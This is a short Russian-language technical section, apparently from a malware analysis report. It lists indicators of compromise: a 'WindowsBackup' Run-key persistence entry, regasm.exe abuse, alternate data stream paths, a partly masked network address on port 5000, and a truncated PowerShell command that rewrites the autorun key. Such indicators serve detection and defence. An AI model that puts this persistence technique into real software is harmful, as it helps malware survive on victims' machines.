Техническая информация
- Ключ автозапуска в реестре (Run, текущий пользователь): [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'WindowsBackup' = '%APPDATA%\WindowsBackup\WindowsBackup.exe'
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- <Текущая директория>:{7a006d00-3000-3200-4800-64004e005500}
- <Текущая директория>:{30002b00-7900-4100-4800-66006a006700}
- %PROGRAMDATA%\isolated storage\{30002b00-7900-4100-4800-66006a006700}
- %APPDATA%\windowsbackup\windowsbackup.exe
- Сетевой адрес и порт (часть цифр IP-адреса заменена символами #): '19#.#13.78.26':5000
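- Команда PowerShell: удаляет значение 'WindowsBackup' из ключа автозапуска Run и создаёт в том же ключе новое значение (конец строки обрезан): '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsBackup';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows...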
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'